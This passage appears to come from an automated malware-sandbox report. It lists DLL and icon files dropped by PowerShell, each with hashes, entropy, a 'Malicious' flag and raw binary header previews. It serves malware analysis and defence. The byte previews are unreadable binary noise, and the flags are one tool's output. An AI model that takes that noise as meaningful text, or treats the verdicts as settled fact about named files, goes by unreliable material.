                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...k...f...0.`...0.n...0.h...0.c.....`...b......)...e.....c.....c.....j.c.....c...Richb...................PE..L...n.,d...........!.....f...|......tk....................................................@.........................P...P................................/..............T........................... ...@............................................text...:e.......f.................. ..`.rdata...Z.......\...j..............@..@.data...(...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):72984
                                                                                                                                                                                                            Entropy (8bit):6.755617527508713
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:a85mWPlKtIGSqpnoOUNGHxvttnGyOuPrF2dRILOQxyO7Syo/PxjP:XmdiHqpjmGx1tnGEzF2dRILOQxheHxD
                                                                                                                                                                                                            MD5:389A85E60B7DA2F29AAA738A7BF2B542
                                                                                                                                                                                                            SHA1:4C6F51FD4C25F22474667AB8078AD974A9628C5D
                                                                                                                                                                                                            SHA-256:8A703DA286CDBC263FE28D0888C03BB899E73B4B7729C44A953CC6139F33E3BE
                                                                                                                                                                                                            SHA-512:898506A70DA25E8D181DF7E7790430ABEFCB0C9EECCB0595A1983CE09B6155DD0C72935470FBB9EF0BFA0BFFC953555693FF2FFA2461C10B84578691CD0C7B50
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7@..s!.]s!.]s!.]zY.]u!.]!T.\q!.].Ny]r!.]!T.\.!.]!T.\y!.]!T.\r!.].T.\v!.]8Y.\q!.]s!.].!.].T.\z!.].T.\r!.].T{]r!.].T.\r!.]Richs!.]........PE..L.....,d...........!.........n.......................................................I....@.........................P...P................................/......8.......T...............................@............................................text....~.......................... ..`.rdata...E.......F..................@..@.data...L...........................@....rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):141592
                                                                                                                                                                                                            Entropy (8bit):6.519132347042123
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Q1ixmpACRnjX8bpl/u3O90wxY77N5ILC792oywBxv:4ixmpPsbppu3zwxWN9b
                                                                                                                                                                                                            MD5:1222DAA5C49F53A36D2843CA9BFE513A
                                                                                                                                                                                                            SHA1:7A43E326B261E75A05CDFA979B80E95B69080173
                                                                                                                                                                                                            SHA-256:69C76B8FE5C873D1A0DFF493C3A3B88090B61EE648AD7681BC0581964465589E
                                                                                                                                                                                                            SHA-512:B5BF384D14C3C8221A42288F97D910491730C84BE0A783F5BD17FC2E3DF7F2BB63529571C97CB08064066AA90F07FA00C837944E43DB62E071089A720A8BB551
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_...>...>...>...F-..>...K...>...K...>...K...>...K...>..=K...>..8B...>...>..r?...F...>..=K...>..=K...>..=KA..>..=K...>..Rich.>..........................PE..L...~.,d...........!.........L......t........................................ .......P....@..........................q..d...4r.........................../..........Pm..T............................m..@...............,............................text............................... ..`.rdata..............................@..@.data....J.......H..................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):45336
                                                                                                                                                                                                            Entropy (8bit):6.855147202310344
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:P3haM22ETqat1lRIJKdnOA28+uJ9fNHVVgVNILX5Wqa5YiSyvRUPxWEaN:P3hy2Emat1b7OA28hbVgVNILX5Wq47Sa
                                                                                                                                                                                                            MD5:2ADC6515740EACC51FC2636F3AD1DBEE
                                                                                                                                                                                                            SHA1:C3BB017B38E3EEC6475282C8B27FC979D18C0ED6
                                                                                                                                                                                                            SHA-256:0A31DCF36F714D4863AB59C67B8F3931E94A02CACED17E61A491085864A0FC7F
                                                                                                                                                                                                            SHA-512:45758EF294DBAF881A2DAA0CFA7E2A5048478E3B2FEE90CACD7B2A2B852883FD6FC314CCD632B257AE22B00CADF4DDA19B46E44438ABD8C48E29227CC4DE5104
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h?...Q..Q..Q.q...Q..|P..Q..|T..Q..|U..Q..|R..Q.m|P..Q..qP..Q..P...Q.m|Y..Q.m|Q..Q.m|...Q.m|S..Q.Rich..Q.................PE..L.....,d...........!.....H...@.......N.......`............................................@..........................t..X...ht..d......................../......d....o..T............................o..@............`..d............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data................j..............@....rsrc................p..............@..@.reloc..d............z..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):109848
                                                                                                                                                                                                            Entropy (8bit):6.470709622203152
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:ocaWMAY1f2sNuTsn2pw1wJEwZ5gw9w/hem8Vw3h8c/Ziwu7lbMyz3JVbI3DRIL9b:oPWMJW3jbI3DLI
                                                                                                                                                                                                            MD5:BA0327CD9CC1B0436DA3351C28CF2AC9
                                                                                                                                                                                                            SHA1:61BA2FD1F60252A3730EDFEE0015CF73119EB5A9
                                                                                                                                                                                                            SHA-256:926CA1BAAB86478144339B73CDE482D86463D743F102F847C77DB18F77CBF129
                                                                                                                                                                                                            SHA-512:AA7C37D1DB0A3ABBAC697BF9438102E7C1B47E1930D601782432E8734D584FA7F2F1D8BAD324139D842100F313504109045B26695538185AEF47EDAC3AD8B9BC
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y{.....T...T...T.bvT...TOo.U...TOo.U...TOo.U...TOo.U...T.o.U...TVb.U...T...T3..T.o.U...T.o.U...T.o.T...T.o.U...TRich...T........PE..L.....,d...........!.....................................................................@..........................)..T...$*..x....................~.../......(...`%..T............................%..@............................................text............................... ..`.rdata...x.......z..................@..@.data...x)...P...&...2..............@....rsrc................X..............@..@.reloc..(............b..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):23832
                                                                                                                                                                                                            Entropy (8bit):6.901034716826324
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ablXmEqJo7v0jyD/EbKG/sJIL6MIBHQIYiSy1pCQsfPSPxh8E9VF0NynfwETaJ:yI9m7yGOsJIL6Mi5YiSyvMqPxWEl4EWJ
                                                                                                                                                                                                            MD5:0A4A545DBB5EAB20B90761B269EA706D
                                                                                                                                                                                                            SHA1:291CE677141442AE1541416CC6ED0A60EC09C8F1
                                                                                                                                                                                                            SHA-256:3DE8F7D9E1FB4BB7776239499A1873F53D0530E58247A987041182A7DF177B5A
                                                                                                                                                                                                            SHA-512:B0648777D5AFDF25114F672AC4198BAE7595828E49EF2F9B2298E29B46CB50C6107290C0EA51221106B772A9B644C0046043F5979263BBCEF1A986B45E8BC86F
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>...P...P...P......P.Q...P.U...P.T...P.S...P...Q...P.Q...P...Q...P...X...P...P...P.......P...R...P.Rich..P.........................PE..L...!.,d...........!................M........ ...............................`...........@..........................&..X...('..d....@.................../...P......8"..T............................"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...P....0....... ..............@....rsrc........@......."..............@..@.reloc.......P.......,..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22808
                                                                                                                                                                                                            Entropy (8bit):6.914447740815648
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:MH9YjQGtloILPSnJoHQIYiSy1pCQ6+eXPxh8E9VF0Nynkh:U7gloILPSnI5YiSyv6NXPxWElc
                                                                                                                                                                                                            MD5:0A5CC0DDD0C99FA7904610B62AD6D83B
                                                                                                                                                                                                            SHA1:9A0E9CDD5820C6DDAC293F418BDD95E58224B6B3
                                                                                                                                                                                                            SHA-256:B023DC4341FFBCDAFB0863B64597DE3E50477FBBE3569E6825BAB113645F91B0
                                                                                                                                                                                                            SHA-512:B27A6883F249477A932FF760DA8A2DDE22EA985435664E4F289803F7EFBD496E9C1D0346672FA6F2110DE1FC6937F14CC534412CCA58A2B8FDD2FFAA1DF6B240
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...Q..Q..Q....Q...P..Q...T..Q...U..Q...R..Q.m.P..Q..P..Q..P..Q.m.Y..Q.m.Q..Q.m....Q.m.S..Q.Rich..Q.........................PE..L... .,d...........!......................... ...............................`......ez....@..........................%.......&..d....@...............*.../...P..`...8!..T............................!..@............ ..p............................text...d........................... ..`.rdata....... ......................@..@.data...0....0......................@....rsrc........@......................@..@.reloc..`....P.......(..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28952
                                                                                                                                                                                                            Entropy (8bit):6.767861948154342
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:6nVWIuaUw1suljCsMILlNY0m5YiSyvhYPxWEae:m7sICsMILlNFc7SyZYPxV
                                                                                                                                                                                                            MD5:3A2A767581CAAFCFF721EEFACF134719
                                                                                                                                                                                                            SHA1:3FFDE94B0F95E5B82B0E9DFCAA58F9C71852C451
                                                                                                                                                                                                            SHA-256:41E648DCD9B41F1068344D05408427E614F277A1030EB062C9B783019895EBF3
                                                                                                                                                                                                            SHA-512:8D7220A2246C5B49728D76777967A5473826D754CF5AACC7975219597E3390207F29139FD44B4B94CC9C0D651204245C2560A558F2FC4DC3E07EE7EF1920E369
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>...P..P..P....P...Q..P...U..P...T..P...S..P.m.Q..P..Q..P..Q..P.m.X..P.m.P..P.m....P.m.R..P.Rich..P.................PE..L.....,d...........!.........(...............0............................................@..........................<..d....<..d....`...............B.../...p.......7..T............................7..@............0...............................text............................... ..`.rdata.......0......................@..@.data...x....P.......2..............@....rsrc........`.......4..............@..@.reloc.......p.......>..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33048
                                                                                                                                                                                                            Entropy (8bit):6.629314319366709
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:VDOzqOFRGnvMhY+lILz/e5YiSyvoPxWEaX+:VDOVOvMhY+lILz/U7SywPx8+
                                                                                                                                                                                                            MD5:930AE073127BEB10674F9F06CCC971FA
                                                                                                                                                                                                            SHA1:65C17F21A0BCF6212031C594B0440F115019EDBD
                                                                                                                                                                                                            SHA-256:13511A167CDA803DAEEA89447777A7CEAEE3257C7638F8F0BC9A5A164EFB981E
                                                                                                                                                                                                            SHA-512:3E41B6F8365FD0ACF9BEB3964371E523CC9268B347FAA2CEF3BCB34F7F7C4447CE41296BEBB7C7ACC994705B4BBF468752EA56E0BA5AE72DB1CE90DEF1DDDEE4
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>...P..P..P....P...Q..P...U..P...T..P...S..P.m.Q..P..Q..P..Q...P.m.X..P.m.P..P.m....P.m.R..P.Rich..P.........................PE..L... .,d...........!.........:...............0.......................................P....@..........................B.......F..d....`...............R.../...p.......=..T............................>..@............0...............................text............................... ..`.rdata..T....0... ..................@..@.data...0....P.......<..............@....rsrc........`.......D..............@..@.reloc.......p.......N..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):56088
                                                                                                                                                                                                            Entropy (8bit):6.856736003724622
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XqolZgY1sJ81ChNhG58qRILOSe4j7SyHPxc:XlTduJphNhG58qRILOSJj1xc
                                                                                                                                                                                                            MD5:6FA4C58474DF471D27A0B137BD129737
                                                                                                                                                                                                            SHA1:441FBCFE5AB8DE057DC64FB964654885D37C7039
                                                                                                                                                                                                            SHA-256:F377A3F0262D5E5B6020E268EAA1BA042161621C122BE4702D836E81904A50A6
                                                                                                                                                                                                            SHA-512:5A79590DF9A0D7C39EB5223C0B9C3A82D3D7301DE69C88227898D07508F7391C65C298B9D65898297D3E005F4E63E62560BF642F30519F1D7179E1E2CC4C35AC
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........p.................................................Q..............-...........Z...Q.......Q.......Q.....Q.......Rich....................PE..L...x.,d...........!.....b...J.......g....................................................@............................P... ............................/..........L...T...............................@...............0............................text...ja.......b.................. ..`.rdata..&*.......,...f..............@..@.data...`...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22808
                                                                                                                                                                                                            Entropy (8bit):6.937211239543495
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:vqIesePwjnE8Gtr5ILZwkeHQIYiSy1pCQiI/NPxh8E9VF0Nyn54qSc:CIeZkgr5ILZwkU5YiSyvT/NPxWElQc
                                                                                                                                                                                                            MD5:59F19A807B3E13D8E707C942A38BF84E
                                                                                                                                                                                                            SHA1:469DEC6DA89737795C72FF51F69B44462E55099A
                                                                                                                                                                                                            SHA-256:7ED17311B391FFFF58F073ECF71829F73629033458A54A435DC62014281A733C
                                                                                                                                                                                                            SHA-512:3C10A7B3AF03E1AE95C577FB4FEE108D0ACFF876DFE0FD1079F74DE30881B5F3659AAA1F52A857CEC9C7430248094E896261C297A25C62D4951252A3A74EB48A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[..:...:...:...B'..:...O...:...O...:...O...:...O...:...O...:...B...:...:...:...O...:...O...:...OK..:...O...:..Rich.:..................PE..L...M.,d...........!......................... ...............................`......5.....@..........................%..L....%..x....@...............*.../...P..l.... ..T...........................H!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..l....P.......(..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39192
                                                                                                                                                                                                            Entropy (8bit):6.848342556185962
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:64mK0kiN79J9M3MMc0U2cLbEMRIL9XbR5YiSyvQydPxWEaQK:6rN9JAU9bEMRIL9X77Sy4WPxdK
                                                                                                                                                                                                            MD5:3737DA6429A20AF06F34F307C5611E1C
                                                                                                                                                                                                            SHA1:5FF4FBF0C655DFF7EADBA5FBEBDC2C889003F869
                                                                                                                                                                                                            SHA-256:FCD5C9C9131113354ACEB5A9ED26C75EA7DDC9B44DDC4286A1EFFFC1E3EE4D55
                                                                                                                                                                                                            SHA-512:BF6C94331E8A84302DA2F0AB765B2F44E3EA69A1472689498F1A6D67451B58A944505B63C607F9004A1B91FB3221CE2FB2FD6F1FA088128057596D762A189ACB
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........./..tA..tA..tA......tA..@..tA..D..tA..E..tA..B..tA.=.@..tA..@..tA..t@.tA.=.I..tA.=.A..tA.=....tA.=.C..tA.Rich.tA.........................PE..L...:.,d...........!.....:...........?.......P............................................@..........................]..T....]..x....................j.../......x....X..T...........................PY..@............P..L............................text....9.......:.................. ..`.rdata..f....P.......>..............@..@.data........p.......V..............@....rsrc................Z..............@..@.reloc..x............d..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2276120
                                                                                                                                                                                                            Entropy (8bit):6.111762453951637
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:3L7Iy5xntVyJSFtv3A8+QK1CPwDv3uFfJKShr:3L7Iy59nFdA8m1CPwDv3uFfJK+
                                                                                                                                                                                                            MD5:4633D62F19C0B25318B1C612995F5C21
                                                                                                                                                                                                            SHA1:50601F9E2B07D616FDE8EE387CE8CDCB0CA451DF
                                                                                                                                                                                                            SHA-256:47376D247AE6033BC30FEE4E52043D3762C1C0C177E3EC27CA46EFF4B95C69B0
                                                                                                                                                                                                            SHA-512:D6A18E43B1A20242F80265054ED8D33598439FFA5DF4920931FF43EC91F1AC2D8A3931913FD5569F48C9B1B9EA845D9E017EA23571A1AC1B352502A3E823ECA9
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..uk..uk..uk...k..uk..tj..uk..pj..uk..qj..uk..vj..uk..tko.uk..tj..uk2.qjs.uk2.uj..uk2..k..uk2.wj..ukRich..uk........PE..L......c...........!...".(...........g.......@................................#.....8."...@.........................`....h....!.T.....".|............."../....".4.......8...............................@.............!..............................text....&.......(.................. ..`.rdata..v*...@...,...,..............@..@.data...TY...p!......X!.............@....idata........!......n!.............@..@.00cfg........!.......!.............@..@.rsrc...|.....".......!.............@..@.reloc........".......!.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):29208
                                                                                                                                                                                                            Entropy (8bit):6.643623418348
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                                                                                                                                                                                                            MD5:BC20614744EBF4C2B8ACD28D1FE54174
                                                                                                                                                                                                            SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                                                                                                                                                                                                            SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                                                                                                                                                                                                            SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):552216
                                                                                                                                                                                                            Entropy (8bit):5.779566253639773
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:MaYPTKwDsuz9V/9SYeujF59CF5e3SnEEATLU2lvzS7u:nYPTRDD9ND58GqbATLU2lvzS7u
                                                                                                                                                                                                            MD5:8845FCF1AE2DE1018DAAAEA01D9BA2D5
                                                                                                                                                                                                            SHA1:DB67697EE052738E6F23CC1D29B261BEF1D423E5
                                                                                                                                                                                                            SHA-256:B7E16AF3EFF9AB0869CFE60C256394A70A867879B7F56544A724D6AC1CCFAB88
                                                                                                                                                                                                            SHA-512:2792FE94DD35B594514C4FAD091C9683EC47814335D046F776CD1F043C576533E99088949F1F1AE6814C16DBDDA430EC53B2D64621EA0C818CADB91EC5E3A788
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x.._x.._x.._qf._t.._7b.^z.._3f.^z.._7b.^s.._7b.^r.._7b.^z.._.b.^{.._x.._..._.b.^T.._.b.^y.._.ba_y.._.b.^y.._Richx.._........................PE..L......c...........!...".....4......."....... ......................................P.....@......................... =...N...........0..s............>.../...@...6...,..8............................+..@............................................text...-........................... ..`.rdata..*k... ...l..................@..@.data....;.......6...|..............@....idata..dA.......B..................@..@.00cfg....... ......................@..@.rsrc...s....0......................@..@.reloc..)>...@...@..................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):75809
                                                                                                                                                                                                            Entropy (8bit):5.969322217946821
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:+sNNRmOha6UEm3BL61Z4tXSZ6HTk1FaA87Gl6L:+2No6UtB+1eJ9Z
                                                                                                                                                                                                            MD5:B35F68A3086562C4D5453FAAD5A3474E
                                                                                                                                                                                                            SHA1:673904FF9B305A6600E47AD715289122EC0B046A
                                                                                                                                                                                                            SHA-256:150C470F9943B806B44312EFDEC85755F22F8D7D52B31F93A9AF3C43E8627381
                                                                                                                                                                                                            SHA-512:6EC80921942B3BD3C85EF24A2DE5454A34A3AD11A1BC69B601AEA7B873E318073C0B2D78C26685999F78EC64A86282C08C53AB8D77E41C661AE968EA52C08176
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...............7......@@......(....8..00...........N.. ..........m]...............f..........h....l........ .t/..Er..@@.... .(B......00.... ..%...... .... ............... .....1......... .h....#...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..{.$.}....w........X..V.....F..]..T..P.H().........P)..<....Y..%%...[B2....2."..\......tOwO..9=.>}^=.5s.....==gz......;..;.T.x..0.3.x.....,.l..f.a..0......`..0.....a&.6..3...`......L0l..f.a..0......`..0.....a&.6..3........_.ro...Y:>.T...V...0c.......3v..X8..0c...56.....f,.t:..,.l....#......k8...l....G..1.u.6..n....5.......w.{...N..ND.\'P.......j...1.!.u+n..v|.._... ..>.....p.....}.v.y.h6...N...%`....[.l....F`.a.....og#....`..6.....f.`#.p..`..6.....fla#0...0c....q.m.9..{......3.\v.e....>}......."...p..w8E.l....`V..........H..l....e.]..~..Nm'....`V$.v..G?.Q...l...0+.6.v..0+.6.f..0+.6.z..0...].........q...O..`..L..w.v6......#....(...a..L.l....`&.6.)+~Y.........aY.{.r?..{.n.....{..F...o\QK.s..L47.p
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):78396
                                                                                                                                                                                                            Entropy (8bit):6.10453452748711
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:WNXYu6xYBxqjlETx2UjHe20dH397tiKZoZa1ABtc8Yg2zR51ZV2vL2inK/fR1:sayx2lETxN+HTo8+bil1ZqdKX
                                                                                                                                                                                                            MD5:B1C9980131A3F20E344AA3AA2C8DEA49
                                                                                                                                                                                                            SHA1:0FE02F0ED5E56BBE7E4E98B1DCA061ED17FBF5C7
                                                                                                                                                                                                            SHA-256:FDA28A734788A3F175CB6AED4DAEB5F05F0E49F6A272CCD2051BA337F7B3B42F
                                                                                                                                                                                                            SHA-512:84CA107ACE44FA1964C6C1EA93FC767BDE88363339FC426A3D660DA53C84BADE14F1FAE99C494483BF2B5312938D84B0C1733C85E82592B8FFE8A28F76186A3A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..............r?......@@......(...8@..00..........`V.. ...........e...............m..........h...xt........ ..1...y..@@.... .(B.....00.... ..%...... .... ............... .....L$........ .h....-...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y..W}..-.^....n.v.lK..@.../.,....`...s0g.@.0.d...8.@B&..9.'.@L....NX-..-.8v[.. ./-....zU..[..[.....w?...zU...[.-......=..#.h4..1./..h....4..F+......@..`...h:...4..F+......@..`...h:...4..F+......@..`...h:...4..F+.....O......x.9..:...t..lB{...B+..E+.M.....j%0Ah..i;,........m.....@.hO`.h..i{.'0v...=.ei%0F.. .C..M.+..<....w..d..~g&.j.*.y.uQ.T`Y..:....w.:.......y.t.BH.w.}.....v..#X.x1.....$0..F....8..<J.R.z8..Z.h....&...4m..'P.V3]..@6...........J ...4m.V...V...D+..A+.M.r.....j% F+.M[s.....Z...}.{Z.....=L.dI..9sF{....4......V.2.'....f.=....@3.h...t%...f.q...L^....Z.hf%.......3g:V.h....h%..V..Y.V.j....z.......#.J@.V...A+.$Z.h:...A,\.0.......t.........@3&fz..4.p..c....w.......\c.].g.....o...n....m.6.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
